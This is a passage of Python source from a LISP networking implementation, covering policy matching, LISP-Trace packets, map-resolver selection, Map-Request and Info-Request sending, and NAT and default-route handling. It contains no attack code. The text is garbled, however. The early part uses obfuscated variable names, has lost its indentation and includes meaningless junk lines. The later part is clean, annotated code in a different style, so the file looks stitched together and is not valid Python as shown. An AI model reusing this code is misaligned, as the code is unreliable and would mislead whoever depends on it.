  i1iI1iII = self . datetime_name
  if ( i1iI1iII . find ( ":" ) == - 1 ) : return ( False )
  if ( i1iI1iII . find ( "-" ) == - 1 ) : return ( False )
  oOO0O000o0 , Ooi1Ii1111II , I11111 , tod = i1iI1iII [ 0 : 4 ] , i1iI1iII [ 5 : 7 ] , i1iI1iII [ 8 : 10 ] , i1iI1iII [ 11 : : ]

  #
  # Each field must be numeric and inside its calendar range. The
  # time-of-day field is bound to "tod" so it does not shadow the time
  # module.
  #
  if ( ( oOO0O000o0 + Ooi1Ii1111II + I11111 ) . isdigit ( ) == False ) : return ( False )
  if ( Ooi1Ii1111II < "01" or Ooi1Ii1111II > "12" ) : return ( False )
  if ( I11111 < "01" or I11111 > "31" ) : return ( False )

  i1Ii1i1 , ooo00oOoO , Ii11II1 = tod . split ( ":" )

  if ( ( i1Ii1i1 + ooo00oOoO + Ii11II1 ) . isdigit ( ) == False ) : return ( False )
  if ( i1Ii1i1 < "00" or i1Ii1i1 > "23" ) : return ( False )
  if ( ooo00oOoO < "00" or ooo00oOoO > "59" ) : return ( False )
  if ( Ii11II1 < "00" or Ii11II1 > "59" ) : return ( False )
  return ( True )
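#
# Note (added, hypothetical value): a datetime string this parser
# accepts looks like "2024-06-30-23:59:59", i.e. YYYY-MM-DD-HH:MM:SS.
#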
def parse_datetime ( self ) :
ooo0Ooo00O0O = self . datetime_name
ooo0Ooo00O0O = ooo0Ooo00O0O . replace ( "-" , "" )
ooo0Ooo00O0O = ooo0Ooo00O0O . replace ( ":" , "" )
self . datetime = int ( ooo0Ooo00O0O )
def now ( self ) :
i1 = datetime . datetime . now ( ) . strftime ( "%Y-%m-%d-%H:%M:%S" )
i1 = lisp_datetime ( i1 )
return ( i1 )
def print_datetime ( self ) :
return ( self . datetime_name )
def future ( self ) :
return ( self . datetime > self . now ( ) . datetime )
def past ( self ) :
return ( self . future ( ) == False )
def now_in_range ( self , upper ) :
return ( self . past ( ) and upper . future ( ) )
def this_year ( self ) :
i1iiI11IiIi1 = str ( self . now ( ) . datetime ) [ 0 : 4 ]
i1 = str ( self . datetime ) [ 0 : 4 ]
return ( i1 == i1iiI11IiIi1 )
def this_month ( self ) :
i1iiI11IiIi1 = str ( self . now ( ) . datetime ) [ 0 : 6 ]
i1 = str ( self . datetime ) [ 0 : 6 ]
return ( i1 == i1iiI11IiIi1 )
def today ( self ) :
i1iiI11IiIi1 = str ( self . now ( ) . datetime ) [ 0 : 8 ]
i1 = str ( self . datetime ) [ 0 : 8 ]
return ( i1 == i1iiI11IiIi1 )
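#
# Note (added): the three tests above work because parse_datetime()
# stores the timestamp as the digit string YYYYMMDDHHMMSS, so comparing
# leading substrings compares year, then month, then day.
#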
class lisp_policy_match ( ) :
def __init__ ( self ) :
self . source_eid = None
self . dest_eid = None
self . source_rloc = None
self . dest_rloc = None
self . rloc_record_name = None
self . geo_name = None
self . elp_name = None
self . rle_name = None
self . json_name = None
self . datetime_lower = None
self . datetime_upper = None
class lisp_policy ( ) :
def __init__ ( self , policy_name ) :
self . policy_name = policy_name
self . match_clauses = [ ]
self . set_action = None
self . set_record_ttl = None
self . set_source_eid = None
self . set_dest_eid = None
self . set_rloc_address = None
self . set_rloc_record_name = None
self . set_geo_name = None
self . set_elp_name = None
self . set_rle_name = None
self . set_json_name = None
def match_policy_map_request ( self , mr , srloc ) :
for i1iI11i in self . match_clauses :
oo00ooOOOo0O = i1iI11i . source_eid
iioOo0oo = mr . source_eid
if ( oo00ooOOOo0O and iioOo0oo and iioOo0oo . is_more_specific ( oo00ooOOOo0O ) == False ) : continue
oo00ooOOOo0O = i1iI11i . dest_eid
iioOo0oo = mr . target_eid
if ( oo00ooOOOo0O and iioOo0oo and iioOo0oo . is_more_specific ( oo00ooOOOo0O ) == False ) : continue
oo00ooOOOo0O = i1iI11i . source_rloc
iioOo0oo = srloc
if ( oo00ooOOOo0O and iioOo0oo and iioOo0oo . is_more_specific ( oo00ooOOOo0O ) == False ) : continue
I11iIi1i1I1i1 = i1iI11i . datetime_lower
oO0ooo00OO = i1iI11i . datetime_upper
if ( I11iIi1i1I1i1 and oO0ooo00OO and I11iIi1i1I1i1 . now_in_range ( oO0ooo00OO ) == False ) : continue
return ( True )
return ( False )
def set_policy_map_reply ( self ) :
i11i11IiI1IiI = ( self . set_rloc_address == None and
self . set_rloc_record_name == None and self . set_geo_name == None and
self . set_elp_name == None and self . set_rle_name == None )
if ( i11i11IiI1IiI ) : return ( None )
I1IIiIIIii = lisp_rloc ( )
if ( self . set_rloc_address ) :
I1IIiIIIii . rloc . copy_address ( self . set_rloc_address )
IiiIIi1 = I1IIiIIIii . rloc . print_address_no_iid ( )
lprint ( "Policy set-rloc-address to {}" . format ( IiiIIi1 ) )
if ( self . set_rloc_record_name ) :
I1IIiIIIii . rloc_name = self . set_rloc_record_name
IiIIO0 = blue ( I1IIiIIIii . rloc_name , False )
lprint ( "Policy set-rloc-record-name to {}" . format ( IiIIO0 ) )
if ( self . set_geo_name ) :
I1IIiIIIii . geo_name = self . set_geo_name
IiIIO0 = I1IIiIIIii . geo_name
o0O0oO00 = "" if lisp_geo_list . has_key ( IiIIO0 ) else "(not configured)"
lprint ( "Policy set-geo-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
if ( self . set_elp_name ) :
I1IIiIIIii . elp_name = self . set_elp_name
IiIIO0 = I1IIiIIIii . elp_name
o0O0oO00 = "" if lisp_elp_list . has_key ( IiIIO0 ) else "(not configured)"
lprint ( "Policy set-elp-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
if ( self . set_rle_name ) :
I1IIiIIIii . rle_name = self . set_rle_name
IiIIO0 = I1IIiIIIii . rle_name
o0O0oO00 = "" if lisp_rle_list . has_key ( IiIIO0 ) else "(not configured)"
lprint ( "Policy set-rle-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
if ( self . set_json_name ) :
I1IIiIIIii . json_name = self . set_json_name
IiIIO0 = I1IIiIIIii . json_name
o0O0oO00 = "" if lisp_json_list . has_key ( IiIIO0 ) else "(not configured)"
lprint ( "Policy set-json-name '{}' {}" . format ( IiIIO0 , o0O0oO00 ) )
return ( I1IIiIIIii )
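#
# Note (added): an RLOC record is built only when at least one of the
# rloc-affecting set-clauses is configured; a None return tells the
# caller this policy does not override the map-reply RLOC.
#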
def save_policy ( self ) :
lisp_policies [ self . policy_name ] = self
class lisp_pubsub ( ) :
def __init__ ( self , itr , port , nonce , ttl , xtr_id ) :
self . itr = itr
self . port = port
self . nonce = nonce
self . uptime = lisp_get_timestamp ( )
self . ttl = ttl
self . xtr_id = xtr_id
self . map_notify_count = 0
def add ( self , eid_prefix ) :
oOoooOOO0o0 = self . ttl
ooOOoo0 = eid_prefix . print_prefix ( )
if ( lisp_pubsub_cache . has_key ( ooOOoo0 ) == False ) :
lisp_pubsub_cache [ ooOOoo0 ] = { }
Ooo = lisp_pubsub_cache [ ooOOoo0 ]
iI1I1 = "Add"
if ( Ooo . has_key ( self . xtr_id ) ) :
iI1I1 = "Replace"
del ( Ooo [ self . xtr_id ] )
Ooo [ self . xtr_id ] = self
ooOOoo0 = green ( ooOOoo0 , False )
I11iiII1I1111 = red ( self . itr . print_address_no_iid ( ) , False )
I1II = "0x" + lisp_hex_string ( self . xtr_id )
lprint ( "{} pubsub state {} for {}, xtr-id: {}, ttl {}" . format ( iI1I1 , ooOOoo0 ,
I11iiII1I1111 , I1II , oOoooOOO0o0 ) )
def delete ( self , eid_prefix ) :
ooOOoo0 = eid_prefix . print_prefix ( )
I11iiII1I1111 = red ( self . itr . print_address_no_iid ( ) , False )
I1II = "0x" + lisp_hex_string ( self . xtr_id )
if ( lisp_pubsub_cache . has_key ( ooOOoo0 ) ) :
Ooo = lisp_pubsub_cache [ ooOOoo0 ]
if ( Ooo . has_key ( self . xtr_id ) ) :
Ooo . pop ( self . xtr_id )
lprint ( "Remove pubsub state {} for {}, xtr-id: {}" . format ( ooOOoo0 ,
I11iiII1I1111 , I1II ) )
class lisp_trace ( ) :
def __init__ ( self ) :
self . nonce = lisp_get_control_nonce ( )
self . packet_json = [ ]
self . local_rloc = None
self . local_port = None
self . lisp_socket = None
def print_trace ( self ) :
IiiI = self . packet_json
lprint ( "LISP-Trace JSON: '{}'" . format ( IiiI ) )
def encode ( self ) :
iII = socket . htonl ( 0x90000000 )
IiiiIi1iiii11 = struct . pack ( "II" , iII , 0 )
IiiiIi1iiii11 += struct . pack ( "Q" , self . nonce )
IiiiIi1iiii11 += json . dumps ( self . packet_json )
return ( IiiiIi1iiii11 )
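#
# Note (added, inferred from decode() and packet_length() below): the
# trace header is a 4-byte type word whose top byte is 0x90 and whose
# low 16 bits carry the local port on receive, a 4-byte local-RLOC word
# (zero on transmit), and an 8-byte nonce, followed by the JSON-encoded
# hop list.
#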
def decode ( self , packet ) :
i1I1iii1I11II = "I"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( False )
iII = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
iII = socket . ntohl ( iII )
if ( ( iII & 0xff000000 ) != 0x90000000 ) : return ( False )
if ( len ( packet ) < Iiiii ) : return ( False )
IiiIIi1 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
IiiIIi1 = socket . ntohl ( IiiIIi1 )
o0OO0O0 = IiiIIi1 >> 24
iIIi1i1i1 = ( IiiIIi1 >> 16 ) & 0xff
iI11i1i1ii = ( IiiIIi1 >> 8 ) & 0xff
Oo0o0OoO00 = IiiIIi1 & 0xff
self . local_rloc = "{}.{}.{}.{}" . format ( o0OO0O0 , iIIi1i1i1 , iI11i1i1ii , Oo0o0OoO00 )
self . local_port = str ( iII & 0xffff )
i1I1iii1I11II = "Q"
Iiiii = struct . calcsize ( i1I1iii1I11II )
if ( len ( packet ) < Iiiii ) : return ( False )
self . nonce = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] ) [ 0 ]
packet = packet [ Iiiii : : ]
if ( len ( packet ) == 0 ) : return ( True )
try :
self . packet_json = json . loads ( packet )
except :
return ( False )
return ( True )
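#
# Sketch (added, not in the original source): a minimal local
# round-trip of encode()/decode(), assuming this class and
# lisp_get_control_nonce() are importable from this module.
#
# t = lisp_trace()
# t.packet_json = [{"seq": 1}]
# r = lisp_trace()
# assert r.decode(t.encode()) == True
# assert r.nonce == t.nonce
#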
def myeid ( self , eid ) :
return ( lisp_is_myeid ( eid ) )
def return_to_sender ( self , lisp_socket , rts_rloc , packet ) :
I1IIiIIIii , Oo0O00O = self . rtr_cache_nat_trace_find ( rts_rloc )
if ( I1IIiIIIii == None ) :
I1IIiIIIii , Oo0O00O = rts_rloc . split ( ":" )
Oo0O00O = int ( Oo0O00O )
lprint ( "Send LISP-Trace to address {}:{}" . format ( I1IIiIIIii , Oo0O00O ) )
else :
lprint ( "Send LISP-Trace to translated address {}:{}" . format ( I1IIiIIIii ,
Oo0O00O ) )
if ( lisp_socket == None ) :
IiII1iiI = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM )
IiII1iiI . bind ( ( "0.0.0.0" , LISP_TRACE_PORT ) )
IiII1iiI . sendto ( packet , ( I1IIiIIIii , Oo0O00O ) )
IiII1iiI . close ( )
else :
lisp_socket . sendto ( packet , ( I1IIiIIIii , Oo0O00O ) )
if 64 - 64: O0 - iII111i
if 82 - 82: O0
if 37 - 37: I1Ii111
    def packet_length(self):
        udp_length = 8; trace_length = 4 + 4 + 8
        return(udp_length + trace_length + len(json.dumps(self.packet_json)))
    def rtr_cache_nat_trace(self, translated_rloc, translated_port):
        key = self.local_rloc + ":" + self.local_port
        value = (translated_rloc, translated_port)
        lisp_rtr_nat_trace_cache[key] = value
        lprint("Cache NAT Trace addresses {} -> {}".format(key, value))

    def rtr_cache_nat_trace_find(self, local_rloc_and_port):
        key = local_rloc_and_port
        try: value = lisp_rtr_nat_trace_cache[key]
        except: value = (None, None)
        return(value)
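
#
# Illustrative sketch (not part of the original flow): how a node might
# decode a received LISP-Trace payload and echo it back. The names
# raw_packet and rts are hypothetical caller-side values.
#
#   trace = lisp_trace()
#   if (trace.decode(raw_packet)):
#       trace.print_trace()
#       rts = trace.local_rloc + ":" + trace.local_port
#       trace.return_to_sender(None, rts, trace.encode())
#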
def lisp_get_map_server(address):
    for ms in lisp_map_servers_list.values():
        if (ms.map_server.is_exact_match(address)): return(ms)
    return(None)
def lisp_get_any_map_server():
    for ms in lisp_map_servers_list.values(): return(ms)
    return(None)
def lisp_get_map_resolver(address, eid):

    #
    # When an address is supplied, find the map-resolver configured with
    # that exact address.
    #
    if (address != None):
        addr_str = address.print_address()
        mr = None
        for key in lisp_map_resolvers_list:
            if (key.find(addr_str) == -1): continue
            mr = lisp_map_resolvers_list[key]
        return(mr)

    #
    # Otherwise select by mr-name: eid == "" means any map-resolver,
    # eid == None means the ones named "all", and a real EID uses the
    # mr-name from its database-mapping.
    #
    if (eid == ""):
        mr_name = ""
    elif (eid == None):
        mr_name = "all"
    else:
        db = lisp_db_for_lookups.lookup_cache(eid, False)
        mr_name = "all" if db == None else db.use_mr_name

    #
    # Of the matching map-resolvers, return the least recently used one.
    #
    oldest = None
    for mr in lisp_map_resolvers_list.values():
        if (mr_name == ""): return(mr)
        if (mr.mr_name != mr_name): continue
        if (oldest == None or mr.last_used < oldest.last_used): oldest = mr
    return(oldest)
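
#
# Illustrative sketch of the three lookup modes above; address and eid are
# hypothetical caller-side values.
#
#   mr = lisp_get_map_resolver(address, None)  # exact match on MR address
#   mr = lisp_get_map_resolver(None, "")       # any configured map-resolver
#   mr = lisp_get_map_resolver(None, eid)      # mr-name from EID's database-mapping
#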
def lisp_get_decent_map_resolver(eid):

    #
    # Hash the EID into a LISP-Decent index and build the DNS name of the
    # map-resolver responsible for it.
    #
    index = lisp_get_decent_index(eid)
    dns_name = str(index) + "." + lisp_decent_dns_suffix

    lprint("Use LISP-Decent map-resolver {} for EID {}".format(
        bold(dns_name, False), eid.print_prefix()))

    oldest = None
    for mr in lisp_map_resolvers_list.values():
        if (dns_name != mr.dns_name): continue
        if (oldest == None or mr.last_used < oldest.last_used): oldest = mr
    return(oldest)
def lisp_ipv4_input(packet):

    #
    # Pass IGMP packets (protocol 2) up to the caller unmodified.
    #
    if (ord(packet[9]) == 2): return([True, packet])

    #
    # Verify the IPv4 header checksum of the inner header.
    #
    checksum = struct.unpack("H", packet[10:12])[0]
    if (checksum == 0):
        dprint("Packet arrived with checksum of 0!")
    else:
        packet = lisp_ip_checksum(packet)
        checksum = struct.unpack("H", packet[10:12])[0]
        if (checksum != 0):
            dprint("IPv4 header checksum failed for inner header")
            packet = lisp_format_packet(packet[0:20])
            dprint("Packet header: {}".format(packet))
            return([False, None])

    #
    # Discard the packet when the TTL is 0 or about to expire.
    #
    ttl = struct.unpack("B", packet[8:9])[0]
    if (ttl == 0):
        dprint("IPv4 packet arrived with ttl 0, packet discarded")
        return([False, None])
    elif (ttl == 1):
        dprint("IPv4 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return([False, None])

    #
    # Decrement the TTL, zero the checksum field, and recompute it.
    #
    ttl -= 1
    packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
    packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
    packet = lisp_ip_checksum(packet)
    return([False, packet])
def lisp_ipv6_input(packet):
    dest = packet.inner_dest
    packet = packet.packet

    #
    # Discard the packet when the hop-limit is 0 or about to expire.
    #
    hop_limit = struct.unpack("B", packet[7:8])[0]
    if (hop_limit == 0):
        dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
        return(None)
    elif (hop_limit == 1):
        dprint("IPv6 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return(None)

    #
    # Never encapsulate IPv6 link-local packets.
    #
    if (dest.is_ipv6_link_local()):
        dprint("Do not encapsulate IPv6 link-local packets")
        return(None)

    hop_limit -= 1
    packet = packet[0:7] + struct.pack("B", hop_limit) + packet[8::]
    return(packet)
def lisp_mac_input(packet):
    return(packet)
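
#
# Illustrative sketch: a receive loop might dispatch the inner packet by
# version to the three input functions above. inner_version and the packet
# variables are hypothetical caller-side names.
#
#   if (inner_version == 4):
#       igmp, packet = lisp_ipv4_input(packet)
#   elif (inner_version == 6):
#       packet = lisp_ipv6_input(packet_object)
#   else:
#       packet = lisp_mac_input(packet)
#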
def lisp_rate_limit_map_request(dest):
    now = lisp_get_timestamp()

    #
    # Never rate-limit while no-rate-limit mode is in effect.
    #
    elapsed = now - lisp_no_map_request_rate_limit
    if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
        seconds_left = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
        dprint("No Rate-Limit Mode for another {} secs".format(seconds_left))
        return(False)

    #
    # Rate-limit when the last Map-Request went out too recently.
    #
    if (lisp_last_map_request_sent == None): return(False)
    elapsed = now - lisp_last_map_request_sent
    rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)

    if (rate_limit):
        dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format(
            green(dest.print_address(), False), round(elapsed, 3)))
    return(rate_limit)
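
#
# Illustrative sketch: callers gate Map-Request generation on the
# rate-limiter. sockets, port, and deid are hypothetical caller-side names.
#
#   if (lisp_rate_limit_map_request(deid) == False):
#       lisp_send_map_request(sockets, port, None, deid, None)
#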
def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc):
    global lisp_last_map_request_sent

    #
    # When rloc is supplied, this Map-Request is an RLOC-probe; remember
    # the probe destination and encap-port.
    #
    probe_dest = probe_port = None
    if (rloc):
        probe_dest = rloc.rloc
        probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT

    #
    # We need local RLOCs for the ITR-RLOCs field of the Map-Request.
    #
    rloc4, rloc6, device = lisp_myrlocs
    if (rloc4 == None):
        lprint("Suppress sending Map-Request, IPv4 RLOC not found")
        return

    if (rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
        lprint("Suppress sending Map-Request, IPv6 RLOC not found")
        return

    map_request = lisp_map_request()
    map_request.record_count = 1
    map_request.nonce = lisp_get_control_nonce()
    map_request.rloc_probe = (probe_dest != None)

    #
    # Remember the nonce used for this RLOC-probe.
    #
    if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce

    multicast = deid.is_multicast_address()
    if (multicast):
        map_request.target_eid = seid
        map_request.target_group = deid
    else:
        map_request.target_eid = deid

    #
    # Sign the Map-Request when a signature-EID is configured; RLOC-probes
    # are never signed.
    #
    if (map_request.rloc_probe == False):
        db = lisp_get_signature_eid()
        if (db):
            map_request.signature_eid.copy_address(db.eid)
            map_request.privkey_filename = "./lisp-sig.pem"

    if (seid == None or multicast):
        map_request.source_eid.afi = LISP_AFI_NONE
    else:
        map_request.source_eid = seid

    #
    # When behind a NAT and probing a non-private address, use the
    # translated (global) RLOC as the ITR-RLOC.
    #
    if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
        if (probe_dest.is_private_address() == False):
            rloc4 = lisp_get_any_translated_rloc()

        if (rloc4 == None):
            lprint("Suppress sending Map-Request, translated RLOC not found")
            return

    #
    # Build the ITR-RLOCs list.
    #
    if (probe_dest == None or probe_dest.is_ipv4()):
        if (lisp_nat_traversal and probe_dest == None):
            translated = lisp_get_any_translated_rloc()
            if (translated != None): rloc4 = translated
        map_request.itr_rlocs.append(rloc4)

    if (probe_dest == None or probe_dest.is_ipv6()):
        if (rloc6 == None or rloc6.is_ipv6_link_local()):
            rloc6 = None
        else:
            map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
            map_request.itr_rlocs.append(rloc6)

    #
    # Choose an inner source address for the ECM.
    #
    if (probe_dest != None and map_request.itr_rlocs != []):
        itr_rloc = map_request.itr_rlocs[0]
    else:
        if (deid.is_ipv4()):
            itr_rloc = rloc4
        elif (deid.is_ipv6()):
            itr_rloc = rloc6
        else:
            itr_rloc = rloc4

    packet = map_request.encode(probe_dest, probe_port)
    map_request.print_map_request()

    #
    # RLOC-probes to xTRs behind NATs must be data-encapsulated; other
    # probes go directly to the control port.
    #
    if (probe_dest != None):
        if (rloc.is_rloc_translated()):
            nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)

            #
            # Gleaned RLOCs may have no NAT state; fabricate it from the
            # RLOC itself.
            #
            if (nat_info == None):
                addr_str = rloc.rloc.print_address_no_iid()
                hostname = "gleaned-{}".format(addr_str)
                port = rloc.translated_port
                nat_info = lisp_nat_info(addr_str, hostname, port)

            lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
                packet)
            return

        addr_str = probe_dest.print_address_no_iid()
        dest = lisp_convert_4to6(addr_str)
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        return

    #
    # Pick a map-resolver and send the Map-Request to it in an ECM.
    #
    db_eid = None if lisp_i_am_rtr else seid
    if (lisp_decent_pull_xtr_configured()):
        mr = lisp_get_decent_map_resolver(deid)
    else:
        mr = lisp_get_map_resolver(None, db_eid)

    if (mr == None):
        lprint("Cannot find Map-Resolver for source-EID {}".format(
            green(seid.print_address(), False)))
        return

    mr.last_used = lisp_get_timestamp()
    mr.map_requests_sent += 1
    if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce

    if (seid == None): seid = itr_rloc
    lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
        mr.map_resolver)

    #
    # Remember when this Map-Request was sent for rate-limiting.
    #
    lisp_last_map_request_sent = lisp_get_timestamp()

    #
    # Periodically re-resolve the map-resolver's DNS name.
    #
    mr.resolve_dns_name()
    return
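
#
# Illustrative sketch of the two call patterns: a map-cache miss passes
# rloc=None so the request goes through a map-resolver; an RLOC-probe
# passes the rloc being probed. All variable names here are hypothetical.
#
#   lisp_send_map_request(sockets, ephem_port, seid, deid, None)  # miss
#   lisp_send_map_request(sockets, ephem_port, seid, deid, rloc)  # probe
#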
def lisp_send_info_request(lisp_sockets, dest, port, device_name):

    #
    # Build Info-Request message.
    #
    info = lisp_info()
    info.nonce = lisp_get_control_nonce()
    if (device_name): info.hostname += "-" + device_name

    dest_str = dest.print_address_no_iid()

    #
    # For multihomed xTRs, temporarily install a host route to the
    # Info-Request destination out the supplied device so the reply
    # reflects this interface's NAT translation. When sending to the
    # control port, wait for any host route installed by another in-flight
    # Info-Request to be removed first.
    #
    installed_host_route = False
    next_hop = None
    if (device_name):
        next_hop = lisp_get_host_route_next_hop(dest_str)

        if (port == LISP_CTRL_PORT and next_hop != None):
            while (True):
                time.sleep(.01)
                next_hop = lisp_get_host_route_next_hop(dest_str)
                if (next_hop == None): break

        default_routes = lisp_get_default_route_next_hops()
        for device, nh in default_routes:
            if (device != device_name): continue

            #
            # Replace any existing host route with one out this device's
            # next-hop.
            #
            if (next_hop != nh):
                if (next_hop != None):
                    lisp_install_host_route(dest_str, next_hop, False)
                lisp_install_host_route(dest_str, nh, True)
                installed_host_route = True
            break

    #
    # Encode and log the Info-Request.
    #
    packet = info.encode()
    info.print_info()

    for_str = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
    for_str = bold(for_str, False)
    port_str = bold("{}".format(port), False)
    dest_print = red(dest_str, False)
    node_str = "RTR " if port == LISP_DATA_PORT else "MS "
    lprint("Send Info-Request to {}{}, port {} {}".format(node_str,
        dest_print, port_str, for_str))

    #
    # Send to the control port directly, or prepend a data header with
    # instance-id 0xffffff so the request traverses the NAT on the data
    # port.
    #
    if (port == LISP_CTRL_PORT):
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    else:
        header = lisp_data_header()
        header.instance_id(0xffffff)
        header = header.encode()
        if (header):
            packet = header + packet
            lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)

    #
    # Remove the temporary host route and restore any previous one.
    #
    if (installed_host_route):
        lisp_install_host_route(dest_str, None, False)
        if (next_hop != None):
            lisp_install_host_route(dest_str, next_hop, True)
    return
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):

    #
    # Parse Info-Request.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return
    info.print_info()

    #
    # Turn the Info-Request into an Info-Reply carrying the global RLOC
    # and port this request was received from.
    #
    info.info_reply = True
    info.global_etr_rloc.store_address(addr_str)
    info.etr_port = sport

    #
    # Echo the hostname back as a distinguished-name private RLOC.
    #
    if (info.hostname != None):
        info.private_etr_rloc.afi = LISP_AFI_NAME
        info.private_etr_rloc.store_address(info.hostname)

    if (rtr_list != None): info.rtr_list = rtr_list
    packet = info.encode()
    info.print_info()

    #
    # Send Info-Reply back to the source of the Info-Request.
    #
    lprint("Send Info-Reply to {}".format(red(addr_str, False)))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, sport, packet)

    #
    # Cache the source of the Info-Request so Map-Notifies can be
    # forwarded through the NAT later.
    #
    info_source = lisp_info_source(info.hostname, addr_str, sport)
    info_source.cache_address_for_info_source()
    return
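
#
# Illustrative sketch of the exchange this function serves (descriptive,
# not code): an xTR behind a NAT sends an Info-Request and the MS/RTR
# answers with the translated address and port it observed.
#
#   xTR ---- Info-Request (private RLOC, hostname) ----> MS/RTR
#   xTR <--- Info-Reply (global RLOC, port, rtr_list) --- MS/RTR
#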
def lisp_get_signature_eid():
    for db in lisp_db_list:
        if (db.signature_eid): return(db)
    return(None)
def lisp_get_any_translated_port():
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_port)
    return(None)
def lisp_get_any_translated_rloc():
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_rloc)
    return(None)
def lisp_get_all_translated_rlocs():
    rloc_list = []
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.is_rloc_translated() == False): continue
            address = rloc_entry.translated_rloc.print_address_no_iid()
            rloc_list.append(address)
    return(rloc_list)
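
#
# Illustrative sketch: the three helpers above differ only in what they
# return for NAT-translated database-mapping RLOCs.
#
#   port = lisp_get_any_translated_port()    # first translated port or None
#   rloc = lisp_get_any_translated_rloc()    # first translated address or None
#   addrs = lisp_get_all_translated_rlocs()  # all translated address strings
#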
def lisp_update_default_routes(map_resolver, iid, rtr_list):
    behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Filter out private RTR addresses when this node is behind a NAT.
    #
    filtered = {}
    for rtr_name in rtr_list:
        if (rtr_name == None): continue
        address = rtr_list[rtr_name]
        if (behind_nat and address.is_private_address()): continue
        filtered[rtr_name] = address
    rtr_list = filtered

    prefix_list = []
    for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
        if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break

        #
        # Unicast default route. Remove any existing entry unless its
        # RLOC-set already matches; checkpoint entries are always replaced.
        #
        eid = lisp_address(afi, "", 0, iid)
        eid.make_default_route(eid)
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc):
            if (mc.checkpoint_entry):
                lprint("Updating checkpoint entry for {}".format(
                    green(mc.print_eid_tuple(), False)))
            elif (mc.do_rloc_sets_match(rtr_list.values())):
                continue
            mc.delete_cache()

        prefix_list.append([eid, ""])

        #
        # Multicast default route.
        #
        group = lisp_address(afi, "", 0, iid)
        group.make_default_multicast_route(group)
        gmc = lisp_map_cache.lookup_cache(group, True)
        if (gmc): gmc = gmc.source_cache.lookup_cache(eid, True)
        if (gmc): gmc.delete_cache()

        prefix_list.append([eid, group])

    if (len(prefix_list) == 0): return

    #
    # Build an RLOC-set of RTRs and add map-cache entries for each
    # default prefix.
    #
    rloc_set = []
    for rtr_name in rtr_list:
        rtr_addr = rtr_list[rtr_name]
        rloc_entry = lisp_rloc()
        rloc_entry.rloc.copy_address(rtr_addr)
        rloc_entry.priority = 254
        rloc_entry.mpriority = 255
        rloc_entry.rloc_name = "RTR"
        rloc_set.append(rloc_entry)

    for eid in prefix_list:
        mc = lisp_mapping(eid[0], eid[1], rloc_set)
        mc.mapping_source = map_resolver
        mc.map_cache_ttl = LISP_MR_TTL * 60
        mc.add_cache()
        lprint("Add {} to map-cache with RTR RLOC-set: {}".format(
            green(mc.print_eid_tuple(), False), rtr_list.keys()))

        #
        # Each map-cache entry needs its own copy of the RLOC-set.
        #
        rloc_set = copy.deepcopy(rloc_set)
    return
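
#
# Illustrative sketch: an ITR that just learned its RTR-set from an
# Info-Reply might refresh its default map-cache entries like this; mr and
# the rtr addresses are hypothetical values.
#
#   rtrs = {"rtr-1": rtr1_address, "rtr-2": rtr2_address}
#   lisp_update_default_routes(mr, lisp_default_iid, rtrs)
#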
def lisp_process_info_reply(source, packet, store):

    #
    # Parse Info-Reply.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return([None, None, False])

    info.print_info()

    #
    # Store the RTR list learned from the Info-Reply.
    #
    new_rtr_set = False
    for rtr in info.rtr_list:
        addr_str = rtr.print_address_no_iid()
        if (lisp_rtr_list.has_key(addr_str)):
            if (lisp_register_all_rtrs == False): continue
            if (lisp_rtr_list[addr_str] != None): continue

        new_rtr_set = True
        lisp_rtr_list[addr_str] = rtr

    #
    # If this ITR's RTR-set changed, repoint the default map-cache entries
    # at the new RTRs.
    #
    if (lisp_i_am_itr and new_rtr_set):
        if (lisp_iid_to_interface == {}):
            lisp_update_default_routes(source, lisp_default_iid,
                lisp_rtr_list)
        else:
            for iid in lisp_iid_to_interface.keys():
                lisp_update_default_routes(source, int(iid), lisp_rtr_list)

    #
    # Callers that do not want translation state stored just get the
    # global RLOC and port back.
    #
